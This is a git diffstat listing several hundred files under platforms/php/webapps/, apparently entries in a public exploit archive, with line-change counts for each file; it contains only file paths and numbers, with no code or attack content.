platforms/php/webapps/5909.pl | 128 +- 
platforms/php/webapps/5910.txt | 98 +- platforms/php/webapps/5911.txt | 76 +- platforms/php/webapps/5913.txt | 134 +- platforms/php/webapps/5914.txt | 134 +- platforms/php/webapps/5915.txt | 58 +- platforms/php/webapps/5924.txt | 200 +- platforms/php/webapps/5925.txt | 102 +- platforms/php/webapps/5928.txt | 104 +- platforms/php/webapps/5929.txt | 98 +- platforms/php/webapps/5930.txt | 104 +- platforms/php/webapps/5931.pl | 122 +- platforms/php/webapps/5932.txt | 98 +- platforms/php/webapps/5933.txt | 30 +- platforms/php/webapps/5934.txt | 90 +- platforms/php/webapps/5935.pl | 212 +- platforms/php/webapps/5936.txt | 90 +- platforms/php/webapps/5937.txt | 128 +- platforms/php/webapps/5938.php | 468 +- platforms/php/webapps/5939.txt | 42 +- platforms/php/webapps/5940.txt | 142 +- platforms/php/webapps/5941.txt | 118 +- platforms/php/webapps/5942.txt | 82 +- platforms/php/webapps/5944.txt | 150 +- platforms/php/webapps/5946.txt | 136 +- platforms/php/webapps/5947.txt | 136 +- platforms/php/webapps/5948.txt | 136 +- platforms/php/webapps/5949.txt | 136 +- platforms/php/webapps/5950.txt | 136 +- platforms/php/webapps/5954.txt | 72 +- platforms/php/webapps/5955.txt | 88 +- platforms/php/webapps/5956.txt | 30 +- platforms/php/webapps/5957.txt | 188 +- platforms/php/webapps/5958.txt | 54 +- platforms/php/webapps/5959.txt | 80 +- platforms/php/webapps/5960.txt | 110 +- platforms/php/webapps/5961.txt | 66 +- platforms/php/webapps/5963.txt | 48 +- platforms/php/webapps/5964.txt | 114 +- platforms/php/webapps/5965.txt | 42 +- platforms/php/webapps/5966.pl | 230 +- platforms/php/webapps/5967.txt | 136 +- platforms/php/webapps/5969.txt | 64 +- platforms/php/webapps/5970.txt | 144 +- platforms/php/webapps/5971.pl | 244 +- platforms/php/webapps/5972.txt | 78 +- platforms/php/webapps/5973.php | 228 +- platforms/php/webapps/5974.txt | 82 +- platforms/php/webapps/5975.txt | 252 +- platforms/php/webapps/5976.pl | 192 +- platforms/php/webapps/5980.txt | 98 +- 
platforms/php/webapps/5981.txt | 48 +- platforms/php/webapps/5982.txt | 30 +- platforms/php/webapps/5983.txt | 30 +- platforms/php/webapps/5984.txt | 118 +- platforms/php/webapps/5985.txt | 126 +- platforms/php/webapps/5986.php | 2528 +-- platforms/php/webapps/5987.txt | 96 +- platforms/php/webapps/5988.txt | 106 +- platforms/php/webapps/5989.txt | 98 +- platforms/php/webapps/5990.txt | 40 +- platforms/php/webapps/5991.txt | 66 +- platforms/php/webapps/5992.txt | 132 +- platforms/php/webapps/5993.txt | 44 +- platforms/php/webapps/5994.pl | 126 +- platforms/php/webapps/5995.pl | 128 +- platforms/php/webapps/5996.txt | 238 +- platforms/php/webapps/5997.pl | 126 +- platforms/php/webapps/5998.txt | 68 +- platforms/php/webapps/5999.txt | 58 +- platforms/php/webapps/6001.txt | 672 +- platforms/php/webapps/6002.pl | 130 +- platforms/php/webapps/6003.txt | 64 +- platforms/php/webapps/6006.php | 1624 +- platforms/php/webapps/6007.txt | 30 +- platforms/php/webapps/6008.php | 252 +- platforms/php/webapps/6009.pl | 212 +- platforms/php/webapps/6010.txt | 50 +- platforms/php/webapps/6011.txt | 116 +- platforms/php/webapps/6014.txt | 32 +- platforms/php/webapps/6015.txt | 144 +- platforms/php/webapps/6016.pl | 90 +- platforms/php/webapps/6017.pl | 244 +- platforms/php/webapps/6018.pl | 360 +- platforms/php/webapps/6019.pl | 420 +- platforms/php/webapps/6021.txt | 110 +- platforms/php/webapps/6022.txt | 116 +- platforms/php/webapps/6023.pl | 256 +- platforms/php/webapps/6024.txt | 66 +- platforms/php/webapps/6025.txt | 62 +- platforms/php/webapps/6027.txt | 116 +- platforms/php/webapps/6028.txt | 50 +- platforms/php/webapps/6033.pl | 218 +- platforms/php/webapps/6034.txt | 86 +- platforms/php/webapps/6035.txt | 100 +- platforms/php/webapps/6036.txt | 44 +- platforms/php/webapps/6037.txt | 44 +- platforms/php/webapps/6040.txt | 230 +- platforms/php/webapps/6041.txt | 86 +- platforms/php/webapps/6042.txt | 44 +- platforms/php/webapps/6044.txt | 94 +- platforms/php/webapps/6047.txt 
| 34 +- platforms/php/webapps/6048.txt | 32 +- platforms/php/webapps/6049.txt | 34 +- platforms/php/webapps/6050.txt | 28 +- platforms/php/webapps/6051.txt | 34 +- platforms/php/webapps/6053.php | 582 +- platforms/php/webapps/6054.pl | 766 +- platforms/php/webapps/6056.txt | 86 +- platforms/php/webapps/6057.txt | 104 +- platforms/php/webapps/6058.txt | 108 +- platforms/php/webapps/6060.php | 888 +- platforms/php/webapps/6061.txt | 84 +- platforms/php/webapps/6062.txt | 84 +- platforms/php/webapps/6063.txt | 84 +- platforms/php/webapps/6064.txt | 84 +- platforms/php/webapps/6065.txt | 84 +- platforms/php/webapps/6066.txt | 84 +- platforms/php/webapps/6067.pl | 452 +- platforms/php/webapps/6068.txt | 120 +- platforms/php/webapps/6069.txt | 112 +- platforms/php/webapps/6070.php | 138 +- platforms/php/webapps/6071.txt | 56 +- platforms/php/webapps/6073.txt | 390 +- platforms/php/webapps/6074.txt | 140 +- platforms/php/webapps/6075.txt | 136 +- platforms/php/webapps/6076.txt | 90 +- platforms/php/webapps/6078.txt | 76 +- platforms/php/webapps/6079.txt | 204 +- platforms/php/webapps/6080.txt | 72 +- platforms/php/webapps/6081.txt | 88 +- platforms/php/webapps/6082.txt | 100 +- platforms/php/webapps/6084.txt | 84 +- platforms/php/webapps/6085.pl | 876 +- platforms/php/webapps/6086.txt | 46 +- platforms/php/webapps/6087.txt | 108 +- platforms/php/webapps/6088.txt | 84 +- platforms/php/webapps/6092.txt | 174 +- platforms/php/webapps/6096.txt | 76 +- platforms/php/webapps/6097.txt | 66 +- platforms/php/webapps/6098.txt | 78 +- platforms/php/webapps/6099.txt | 68 +- platforms/php/webapps/6102.txt | 78 +- platforms/php/webapps/6107.txt | 130 +- platforms/php/webapps/6112.txt | 56 +- platforms/php/webapps/6113.pl | 174 +- platforms/php/webapps/6114.txt | 32 +- platforms/php/webapps/6115.txt | 100 +- platforms/php/webapps/6117.txt | 112 +- platforms/php/webapps/6125.txt | 76 +- platforms/php/webapps/6126.txt | 22 +- platforms/php/webapps/6127.htm | 42 +- 
platforms/php/webapps/6128.txt | 72 +- platforms/php/webapps/6131.txt | 50 +- platforms/php/webapps/6132.txt | 38 +- platforms/php/webapps/6133.txt | 76 +- platforms/php/webapps/6134.txt | 66 +- platforms/php/webapps/6136.txt | 134 +- platforms/php/webapps/6137.txt | 630 +- platforms/php/webapps/6138.txt | 70 +- platforms/php/webapps/6139.txt | 52 +- platforms/php/webapps/6140.txt | 76 +- platforms/php/webapps/6141.txt | 70 +- platforms/php/webapps/6142.txt | 52 +- platforms/php/webapps/6143.txt | 102 +- platforms/php/webapps/6144.txt | 114 +- platforms/php/webapps/6145.txt | 34 +- platforms/php/webapps/6146.txt | 152 +- platforms/php/webapps/6147.txt | 108 +- platforms/php/webapps/6148.txt | 72 +- platforms/php/webapps/6149.txt | 142 +- platforms/php/webapps/6150.txt | 182 +- platforms/php/webapps/6153.txt | 62 +- platforms/php/webapps/6154.txt | 132 +- platforms/php/webapps/6156.txt | 136 +- platforms/php/webapps/6159.txt | 140 +- platforms/php/webapps/6160.txt | 28 +- platforms/php/webapps/6161.txt | 46 +- platforms/php/webapps/6162.txt | 48 +- platforms/php/webapps/6164.txt | 48 +- platforms/php/webapps/6165.txt | 78 +- platforms/php/webapps/6166.php | 136 +- platforms/php/webapps/6167.txt | 86 +- platforms/php/webapps/6168.php | 136 +- platforms/php/webapps/6169.txt | 128 +- platforms/php/webapps/6170.txt | 110 +- platforms/php/webapps/6171.pl | 152 +- platforms/php/webapps/6172.pl | 408 +- platforms/php/webapps/6173.txt | 372 +- platforms/php/webapps/6176.txt | 212 +- platforms/php/webapps/6177.php | 284 +- platforms/php/webapps/6178.php | 504 +- platforms/php/webapps/6179.txt | 84 +- platforms/php/webapps/6182.txt | 116 +- platforms/php/webapps/6183.txt | 36 +- platforms/php/webapps/6184.txt | 110 +- platforms/php/webapps/6185.txt | 74 +- platforms/php/webapps/6186.txt | 74 +- platforms/php/webapps/6187.txt | 74 +- platforms/php/webapps/6189.txt | 112 +- platforms/php/webapps/6190.txt | 42 +- platforms/php/webapps/6191.txt | 92 +- 
platforms/php/webapps/6192.txt | 102 +- platforms/php/webapps/6193.txt | 90 +- platforms/php/webapps/6194.pl | 214 +- platforms/php/webapps/6199.pl | 226 +- platforms/php/webapps/6200.txt | 34 +- platforms/php/webapps/6203.txt | 104 +- platforms/php/webapps/6204.txt | 238 +- platforms/php/webapps/6205.txt | 124 +- platforms/php/webapps/6206.txt | 66 +- platforms/php/webapps/6207.txt | 24 +- platforms/php/webapps/6208.txt | 38 +- platforms/php/webapps/6213.txt | 66 +- platforms/php/webapps/6214.php | 102 +- platforms/php/webapps/6215.txt | 88 +- platforms/php/webapps/6223.php | 108 +- platforms/php/webapps/6225.txt | 96 +- platforms/php/webapps/6226.txt | 96 +- platforms/php/webapps/6228.txt | 46 +- platforms/php/webapps/6230.txt | 98 +- platforms/php/webapps/6231.txt | 32 +- platforms/php/webapps/6232.txt | 56 +- platforms/php/webapps/6233.txt | 40 +- platforms/php/webapps/6234.txt | 180 +- platforms/php/webapps/6235.txt | 52 +- platforms/php/webapps/6247.txt | 42 +- platforms/php/webapps/6249.txt | 120 +- platforms/php/webapps/6250.txt | 62 +- platforms/php/webapps/6254.txt | 46 +- platforms/php/webapps/6258.txt | 92 +- platforms/php/webapps/6259.txt | 128 +- platforms/php/webapps/6260.txt | 70 +- platforms/php/webapps/6261.txt | 230 +- platforms/php/webapps/6270.txt | 100 +- platforms/php/webapps/6271.txt | 118 +- platforms/php/webapps/6273.txt | 158 +- platforms/php/webapps/6276.txt | 104 +- platforms/php/webapps/6277.txt | 90 +- platforms/php/webapps/6280.txt | 62 +- platforms/php/webapps/6281.pl | 170 +- platforms/php/webapps/6284.txt | 48 +- platforms/php/webapps/6285.txt | 122 +- platforms/php/webapps/6286.txt | 64 +- platforms/php/webapps/6287.txt | 60 +- platforms/php/webapps/6288.txt | 94 +- platforms/php/webapps/6291.txt | 392 +- platforms/php/webapps/6292.txt | 102 +- platforms/php/webapps/6294.txt | 84 +- platforms/php/webapps/6295.txt | 76 +- platforms/php/webapps/6296.txt | 40 +- platforms/php/webapps/6297.txt | 46 +- platforms/php/webapps/6298.txt | 
58 +- platforms/php/webapps/6300.txt | 322 +- platforms/php/webapps/6301.txt | 650 +- platforms/php/webapps/6303.txt | 120 +- platforms/php/webapps/6306.pl | 84 +- platforms/php/webapps/6307.txt | 106 +- platforms/php/webapps/6309.txt | 76 +- platforms/php/webapps/631.txt | 6 +- platforms/php/webapps/6310.txt | 120 +- platforms/php/webapps/6311.php | 168 +- platforms/php/webapps/6312.txt | 254 +- platforms/php/webapps/6313.txt | 216 +- platforms/php/webapps/6315.txt | 64 +- platforms/php/webapps/6316.php | 320 +- platforms/php/webapps/6320.txt | 54 +- platforms/php/webapps/6321.txt | 48 +- platforms/php/webapps/6325.php | 3490 ++--- platforms/php/webapps/6332.txt | 150 +- platforms/php/webapps/6335.txt | 118 +- platforms/php/webapps/6336.txt | 134 +- platforms/php/webapps/6338.txt | 50 +- platforms/php/webapps/6339.txt | 184 +- platforms/php/webapps/6341.txt | 12 +- platforms/php/webapps/6342.txt | 40 +- platforms/php/webapps/6343.txt | 52 +- platforms/php/webapps/6346.pl | 106 +- platforms/php/webapps/6347.txt | 50 +- platforms/php/webapps/6348.txt | 114 +- platforms/php/webapps/6349.txt | 108 +- platforms/php/webapps/635.txt | 6 +- platforms/php/webapps/6350.txt | 102 +- platforms/php/webapps/6351.txt | 142 +- platforms/php/webapps/6354.txt | 132 +- platforms/php/webapps/6356.php | 110 +- platforms/php/webapps/6357.txt | 106 +- platforms/php/webapps/6361.txt | 108 +- platforms/php/webapps/6362.txt | 134 +- platforms/php/webapps/6363.txt | 48 +- platforms/php/webapps/6364.txt | 154 +- platforms/php/webapps/6368.php | 138 +- platforms/php/webapps/6369.py | 130 +- platforms/php/webapps/6370.pl | 424 +- platforms/php/webapps/6371.txt | 60 +- platforms/php/webapps/6373.txt | 60 +- platforms/php/webapps/6374.txt | 60 +- platforms/php/webapps/6375.txt | 60 +- platforms/php/webapps/6376.txt | 60 +- platforms/php/webapps/6378.txt | 36 +- platforms/php/webapps/6379.txt | 44 +- platforms/php/webapps/6380.txt | 36 +- platforms/php/webapps/6381.txt | 36 +- 
platforms/php/webapps/6382.txt | 36 +- platforms/php/webapps/6383.txt | 88 +- platforms/php/webapps/6385.txt | 48 +- platforms/php/webapps/6388.txt | 72 +- platforms/php/webapps/6390.txt | 42 +- platforms/php/webapps/6392.php | 282 +- platforms/php/webapps/6393.pl | 386 +- platforms/php/webapps/6395.txt | 90 +- platforms/php/webapps/6396.txt | 122 +- platforms/php/webapps/6397.txt | 68 +- platforms/php/webapps/6398.txt | 26 +- platforms/php/webapps/6401.txt | 122 +- platforms/php/webapps/6402.txt | 70 +- platforms/php/webapps/6403.txt | 92 +- platforms/php/webapps/6404.txt | 127 +- platforms/php/webapps/6406.txt | 74 +- platforms/php/webapps/6408.txt | 102 +- platforms/php/webapps/6409.txt | 92 +- platforms/php/webapps/6411.txt | 96 +- platforms/php/webapps/6412.txt | 28 +- platforms/php/webapps/6413.txt | 62 +- platforms/php/webapps/6416.txt | 118 +- platforms/php/webapps/6417.txt | 124 +- platforms/php/webapps/6421.php | 310 +- platforms/php/webapps/6422.txt | 124 +- platforms/php/webapps/6423.txt | 86 +- platforms/php/webapps/6425.txt | 102 +- platforms/php/webapps/6426.txt | 110 +- platforms/php/webapps/6427.txt | 30 +- platforms/php/webapps/6428.pl | 410 +- platforms/php/webapps/6430.txt | 46 +- platforms/php/webapps/6431.pl | 368 +- platforms/php/webapps/6432.py | 96 +- platforms/php/webapps/6433.txt | 78 +- platforms/php/webapps/6435.txt | 78 +- platforms/php/webapps/6436.txt | 32 +- platforms/php/webapps/6437.txt | 76 +- platforms/php/webapps/6438.pl | 270 +- platforms/php/webapps/6439.txt | 36 +- platforms/php/webapps/6440.pl | 430 +- platforms/php/webapps/6442.txt | 68 +- platforms/php/webapps/6443.pl | 96 +- platforms/php/webapps/6444.txt | 130 +- platforms/php/webapps/6445.txt | 54 +- platforms/php/webapps/6446.txt | 62 +- platforms/php/webapps/6447.txt | 118 +- platforms/php/webapps/6449.php | 166 +- platforms/php/webapps/645.pl | 6 +- platforms/php/webapps/6450.pl | 112 +- platforms/php/webapps/6451.txt | 88 +- platforms/php/webapps/6452.txt | 26 +- 
platforms/php/webapps/6455.txt | 52 +- platforms/php/webapps/6456.txt | 60 +- platforms/php/webapps/6457.txt | 20 +- platforms/php/webapps/6460.txt | 44 +- platforms/php/webapps/6461.txt | 104 +- platforms/php/webapps/6462.pl | 132 +- platforms/php/webapps/6464.txt | 76 +- platforms/php/webapps/6465.txt | 54 +- platforms/php/webapps/6466.txt | 82 +- platforms/php/webapps/6467.txt | 66 +- platforms/php/webapps/6468.txt | 242 +- platforms/php/webapps/6469.txt | 90 +- platforms/php/webapps/647.pl | 6 +- platforms/php/webapps/6473.txt | 72 +- platforms/php/webapps/6475.txt | 48 +- platforms/php/webapps/6478.txt | 28 +- platforms/php/webapps/6480.txt | 66 +- platforms/php/webapps/6482.txt | 92 +- platforms/php/webapps/6483.txt | 50 +- platforms/php/webapps/6485.txt | 84 +- platforms/php/webapps/6486.txt | 70 +- platforms/php/webapps/6487.txt | 62 +- platforms/php/webapps/6488.txt | 44 +- platforms/php/webapps/6489.txt | 114 +- platforms/php/webapps/6492.php | 364 +- platforms/php/webapps/6494.txt | 54 +- platforms/php/webapps/6495.txt | 30 +- platforms/php/webapps/6499.txt | 146 +- platforms/php/webapps/6500.txt | 20 +- platforms/php/webapps/6501.txt | 64 +- platforms/php/webapps/6502.txt | 80 +- platforms/php/webapps/6503.txt | 118 +- platforms/php/webapps/6504.txt | 50 +- platforms/php/webapps/6505.txt | 128 +- platforms/php/webapps/6507.php | 800 +- platforms/php/webapps/6508.txt | 66 +- platforms/php/webapps/6510.txt | 130 +- platforms/php/webapps/6511.txt | 128 +- platforms/php/webapps/6512.txt | 50 +- platforms/php/webapps/6513.txt | 110 +- platforms/php/webapps/6514.txt | 129 +- platforms/php/webapps/6516.txt | 72 +- platforms/php/webapps/6517.txt | 60 +- platforms/php/webapps/6518.txt | 60 +- platforms/php/webapps/6519.php | 254 +- platforms/php/webapps/6520.txt | 40 +- platforms/php/webapps/6521.txt | 20 +- platforms/php/webapps/6522.txt | 122 +- platforms/php/webapps/6524.txt | 68 +- platforms/php/webapps/6525.txt | 68 +- platforms/php/webapps/6526.txt | 22 +- 
platforms/php/webapps/6527.txt | 34 +- platforms/php/webapps/6529.php | 134 +- platforms/php/webapps/6531.txt | 96 +- platforms/php/webapps/6533.txt | 71 +- platforms/php/webapps/6535.txt | 78 +- platforms/php/webapps/6536.pl | 120 +- platforms/php/webapps/6538.txt | 77 +- platforms/php/webapps/6539.txt | 79 +- platforms/php/webapps/6540.pl | 98 +- platforms/php/webapps/6541.txt | 48 +- platforms/php/webapps/6542.txt | 60 +- platforms/php/webapps/6543.txt | 81 +- platforms/php/webapps/6544.txt | 30 +- platforms/php/webapps/6545.txt | 132 +- platforms/php/webapps/6546.pl | 122 +- platforms/php/webapps/6547.txt | 40 +- platforms/php/webapps/6549.txt | 96 +- platforms/php/webapps/6551.txt | 101 +- platforms/php/webapps/6552.txt | 93 +- platforms/php/webapps/6553.txt | 77 +- platforms/php/webapps/6555.txt | 114 +- platforms/php/webapps/6556.txt | 30 +- platforms/php/webapps/6557.txt | 60 +- platforms/php/webapps/6558.txt | 91 +- platforms/php/webapps/6559.txt | 127 +- platforms/php/webapps/6562.txt | 99 +- platforms/php/webapps/6563.txt | 115 +- platforms/php/webapps/6564.txt | 121 +- platforms/php/webapps/6566.txt | 114 +- platforms/php/webapps/6567.pl | 190 +- platforms/php/webapps/6568.txt | 22 +- platforms/php/webapps/6569.txt | 42 +- platforms/php/webapps/6571.txt | 75 +- platforms/php/webapps/6575.txt | 58 +- platforms/php/webapps/6576.txt | 114 +- platforms/php/webapps/6577.txt | 120 +- platforms/php/webapps/6578.txt | 116 +- platforms/php/webapps/6579.txt | 20 +- platforms/php/webapps/6580.txt | 18 +- platforms/php/webapps/6583.txt | 70 +- platforms/php/webapps/6584.txt | 126 +- platforms/php/webapps/6585.txt | 52 +- platforms/php/webapps/6586.txt | 84 +- platforms/php/webapps/6587.txt | 96 +- platforms/php/webapps/6589.txt | 62 +- platforms/php/webapps/6590.txt | 26 +- platforms/php/webapps/6591.txt | 18 +- platforms/php/webapps/6592.txt | 94 +- platforms/php/webapps/6593.txt | 56 +- platforms/php/webapps/6594.txt | 36 +- platforms/php/webapps/6595.txt | 96 +- 
platforms/php/webapps/6596.txt | 66 +- platforms/php/webapps/6598.txt | 54 +- platforms/php/webapps/6601.txt | 79 +- platforms/php/webapps/6602.txt | 83 +- platforms/php/webapps/6603.txt | 110 +- platforms/php/webapps/6604.txt | 110 +- platforms/php/webapps/6605.txt | 112 +- platforms/php/webapps/6606.txt | 131 +- platforms/php/webapps/6607.txt | 46 +- platforms/php/webapps/6608.txt | 124 +- platforms/php/webapps/6611.php | 96 +- platforms/php/webapps/6612.txt | 36 +- platforms/php/webapps/6613.txt | 88 +- platforms/php/webapps/6617.txt | 46 +- platforms/php/webapps/6618.txt | 30 +- platforms/php/webapps/6620.txt | 70 +- platforms/php/webapps/6621.txt | 18 +- platforms/php/webapps/6623.txt | 72 +- platforms/php/webapps/6624.txt | 124 +- platforms/php/webapps/6625.txt | 28 +- platforms/php/webapps/6626.txt | 90 +- platforms/php/webapps/6628.txt | 40 +- platforms/php/webapps/6629.txt | 112 +- platforms/php/webapps/6632.txt | 72 +- platforms/php/webapps/6633.txt | 102 +- platforms/php/webapps/6635.txt | 18 +- platforms/php/webapps/6636.txt | 72 +- platforms/php/webapps/6637.txt | 98 +- platforms/php/webapps/6639.txt | 78 +- platforms/php/webapps/6640.pl | 100 +- platforms/php/webapps/6641.txt | 84 +- platforms/php/webapps/6642.txt | 26 +- platforms/php/webapps/6644.txt | 34 +- platforms/php/webapps/6645.txt | 38 +- platforms/php/webapps/6646.php | 214 +- platforms/php/webapps/6648.txt | 104 +- platforms/php/webapps/6649.txt | 44 +- platforms/php/webapps/6650.txt | 160 +- platforms/php/webapps/6652.txt | 42 +- platforms/php/webapps/6653.txt | 98 +- platforms/php/webapps/6655.php | 106 +- platforms/php/webapps/6657.pl | 182 +- platforms/php/webapps/6659.txt | 110 +- platforms/php/webapps/6663.txt | 160 +- platforms/php/webapps/6664.txt | 94 +- platforms/php/webapps/6667.txt | 130 +- platforms/php/webapps/6669.txt | 68 +- platforms/php/webapps/6670.txt | 156 +- platforms/php/webapps/6674.pl | 260 +- platforms/php/webapps/6675.pl | 300 +- platforms/php/webapps/6676.txt | 
388 +- platforms/php/webapps/6677.pl | 206 +- platforms/php/webapps/6678.txt | 82 +- platforms/php/webapps/6679.txt | 74 +- platforms/php/webapps/6680.txt | 40 +- platforms/php/webapps/6681.txt | 80 +- platforms/php/webapps/6682.txt | 76 +- platforms/php/webapps/6683.txt | 80 +- platforms/php/webapps/6684.txt | 70 +- platforms/php/webapps/6685.txt | 148 +- platforms/php/webapps/6687.pl | 106 +- platforms/php/webapps/6691.txt | 42 +- platforms/php/webapps/6692.txt | 32 +- platforms/php/webapps/6693.txt | 90 +- platforms/php/webapps/6694.txt | 74 +- platforms/php/webapps/6695.txt | 74 +- platforms/php/webapps/6696.txt | 74 +- platforms/php/webapps/6697.txt | 72 +- platforms/php/webapps/6700.txt | 26 +- platforms/php/webapps/6701.txt | 136 +- platforms/php/webapps/6702.txt | 40 +- platforms/php/webapps/6703.txt | 46 +- platforms/php/webapps/6706.php | 130 +- platforms/php/webapps/6707.txt | 31 +- platforms/php/webapps/6708.txt | 23 +- platforms/php/webapps/6709.txt | 102 +- platforms/php/webapps/6710.txt | 32 +- platforms/php/webapps/6712.txt | 90 +- platforms/php/webapps/6713.txt | 56 +- platforms/php/webapps/6714.pl | 226 +- platforms/php/webapps/6715.txt | 36 +- platforms/php/webapps/6721.txt | 42 +- platforms/php/webapps/6722.txt | 52 +- platforms/php/webapps/6723.txt | 82 +- platforms/php/webapps/6724.txt | 78 +- platforms/php/webapps/6728.txt | 50 +- platforms/php/webapps/6729.php | 122 +- platforms/php/webapps/6730.txt | 78 +- platforms/php/webapps/6733.txt | 36 +- platforms/php/webapps/6734.txt | 44 +- platforms/php/webapps/6735.php | 204 +- platforms/php/webapps/6736.txt | 58 +- platforms/php/webapps/6737.txt | 240 +- platforms/php/webapps/6739.txt | 112 +- platforms/php/webapps/6740.txt | 62 +- platforms/php/webapps/6743.pl | 146 +- platforms/php/webapps/6744.txt | 142 +- platforms/php/webapps/6745.txt | 90 +- platforms/php/webapps/6746.txt | 74 +- platforms/php/webapps/6747.php | 462 +- platforms/php/webapps/6748.txt | 54 +- platforms/php/webapps/6749.php | 
3402 ++-- platforms/php/webapps/6751.txt | 60 +- platforms/php/webapps/6754.txt | 74 +- platforms/php/webapps/6755.php | 344 +- platforms/php/webapps/6758.txt | 66 +- platforms/php/webapps/6759.txt | 220 +- platforms/php/webapps/6760.txt | 54 +- platforms/php/webapps/6762.txt | 100 +- platforms/php/webapps/6763.txt | 42 +- platforms/php/webapps/6764.php | 494 +- platforms/php/webapps/6765.txt | 122 +- platforms/php/webapps/6766.txt | 90 +- platforms/php/webapps/6767.txt | 52 +- platforms/php/webapps/6768.txt | 272 +- platforms/php/webapps/6769.pl | 120 +- platforms/php/webapps/6770.txt | 34 +- platforms/php/webapps/6772.txt | 62 +- platforms/php/webapps/6777.txt | 104 +- platforms/php/webapps/6778.pl | 90 +- platforms/php/webapps/6779.txt | 42 +- platforms/php/webapps/6780.txt | 94 +- platforms/php/webapps/6781.pl | 128 +- platforms/php/webapps/6782.php | 250 +- platforms/php/webapps/6784.pl | 108 +- platforms/php/webapps/6785.txt | 87 +- platforms/php/webapps/6788.txt | 64 +- platforms/php/webapps/6789.pl | 238 +- platforms/php/webapps/6790.py | 108 +- platforms/php/webapps/6792.txt | 74 +- platforms/php/webapps/6795.txt | 48 +- platforms/php/webapps/6796.txt | 56 +- platforms/php/webapps/6797.txt | 106 +- platforms/php/webapps/6799.txt | 96 +- platforms/php/webapps/6802.txt | 90 +- platforms/php/webapps/6803.txt | 36 +- platforms/php/webapps/6806.txt | 66 +- platforms/php/webapps/6808.pl | 60 +- platforms/php/webapps/6809.txt | 80 +- platforms/php/webapps/6811.txt | 96 +- platforms/php/webapps/6814.php | 94 +- platforms/php/webapps/6816.txt | 52 +- platforms/php/webapps/6817.txt | 110 +- platforms/php/webapps/6818.txt | 72 +- platforms/php/webapps/6819.txt | 94 +- platforms/php/webapps/6820.pl | 230 +- platforms/php/webapps/6821.txt | 34 +- platforms/php/webapps/6822.txt | 176 +- platforms/php/webapps/6823.txt | 54 +- platforms/php/webapps/6826.txt | 84 +- platforms/php/webapps/6827.txt | 86 +- platforms/php/webapps/6829.txt | 94 +- platforms/php/webapps/6830.txt 
| 42 +- platforms/php/webapps/6833.txt | 144 +- platforms/php/webapps/6835.txt | 116 +- platforms/php/webapps/6836.txt | 28 +- platforms/php/webapps/6837.txt | 92 +- platforms/php/webapps/6839.txt | 86 +- platforms/php/webapps/6842.txt | 58 +- platforms/php/webapps/6843.txt | 51 +- platforms/php/webapps/6844.pl | 116 +- platforms/php/webapps/6846.txt | 76 +- platforms/php/webapps/6847.txt | 88 +- platforms/php/webapps/6849.txt | 62 +- platforms/php/webapps/6850.txt | 56 +- platforms/php/webapps/6852.pl | 100 +- platforms/php/webapps/6853.txt | 108 +- platforms/php/webapps/6854.txt | 46 +- platforms/php/webapps/6855.txt | 12 +- platforms/php/webapps/6856.txt | 62 +- platforms/php/webapps/6857.txt | 26 +- platforms/php/webapps/6858.txt | 86 +- platforms/php/webapps/6859.txt | 68 +- platforms/php/webapps/6860.txt | 40 +- platforms/php/webapps/6861.pl | 138 +- platforms/php/webapps/6862.txt | 20 +- platforms/php/webapps/6866.pl | 104 +- platforms/php/webapps/6867.pl | 116 +- platforms/php/webapps/6868.pl | 132 +- platforms/php/webapps/6869.txt | 146 +- platforms/php/webapps/6874.txt | 108 +- platforms/php/webapps/6876.txt | 82 +- platforms/php/webapps/6877.txt | 94 +- platforms/php/webapps/6879.txt | 58 +- platforms/php/webapps/6881.txt | 70 +- platforms/php/webapps/6882.txt | 76 +- platforms/php/webapps/6883.txt | 76 +- platforms/php/webapps/6885.txt | 78 +- platforms/php/webapps/6886.txt | 84 +- platforms/php/webapps/6887.txt | 24 +- platforms/php/webapps/6888.txt | 68 +- platforms/php/webapps/6889.txt | 50 +- platforms/php/webapps/6890.txt | 48 +- platforms/php/webapps/6891.txt | 48 +- platforms/php/webapps/6892.txt | 50 +- platforms/php/webapps/6893.txt | 50 +- platforms/php/webapps/6894.txt | 47 +- platforms/php/webapps/6895.txt | 47 +- platforms/php/webapps/6896.txt | 110 +- platforms/php/webapps/6897.txt | 132 +- platforms/php/webapps/6898.txt | 72 +- platforms/php/webapps/6900.txt | 26 +- platforms/php/webapps/6901.txt | 36 +- platforms/php/webapps/6902.txt | 
36 +- platforms/php/webapps/6903.txt | 32 +- platforms/php/webapps/6904.txt | 40 +- platforms/php/webapps/6905.txt | 64 +- platforms/php/webapps/6906.txt | 64 +- platforms/php/webapps/6907.txt | 64 +- platforms/php/webapps/6908.txt | 68 +- platforms/php/webapps/6909.txt | 82 +- platforms/php/webapps/6910.txt | 90 +- platforms/php/webapps/6911.txt | 66 +- platforms/php/webapps/6912.txt | 48 +- platforms/php/webapps/6913.txt | 62 +- platforms/php/webapps/6914.txt | 74 +- platforms/php/webapps/6915.txt | 30 +- platforms/php/webapps/6916.txt | 40 +- platforms/php/webapps/6917.php | 174 +- platforms/php/webapps/6918.txt | 68 +- platforms/php/webapps/6919.txt | 52 +- platforms/php/webapps/6920.txt | 36 +- platforms/php/webapps/6922.txt | 78 +- platforms/php/webapps/6923.txt | 52 +- platforms/php/webapps/6924.txt | 74 +- platforms/php/webapps/6925.txt | 52 +- platforms/php/webapps/6927.txt | 88 +- platforms/php/webapps/6928.txt | 82 +- platforms/php/webapps/6929.txt | 176 +- platforms/php/webapps/6930.txt | 64 +- platforms/php/webapps/6931.txt | 62 +- platforms/php/webapps/6932.txt | 48 +- platforms/php/webapps/6933.pl | 260 +- platforms/php/webapps/6934.txt | 70 +- platforms/php/webapps/6935.txt | 63 +- platforms/php/webapps/6936.txt | 61 +- platforms/php/webapps/6937.txt | 71 +- platforms/php/webapps/6938.txt | 61 +- platforms/php/webapps/6939.txt | 65 +- platforms/php/webapps/6940.txt | 63 +- platforms/php/webapps/6941.txt | 65 +- platforms/php/webapps/6942.txt | 65 +- platforms/php/webapps/6943.txt | 67 +- platforms/php/webapps/6944.txt | 63 +- platforms/php/webapps/6945.txt | 65 +- platforms/php/webapps/6946.txt | 63 +- platforms/php/webapps/6947.txt | 65 +- platforms/php/webapps/6948.txt | 63 +- platforms/php/webapps/6949.txt | 64 +- platforms/php/webapps/6951.txt | 63 +- platforms/php/webapps/6952.txt | 53 +- platforms/php/webapps/6953.txt | 44 +- platforms/php/webapps/6954.txt | 50 +- platforms/php/webapps/6955.txt | 114 +- platforms/php/webapps/6956.txt | 266 +- 
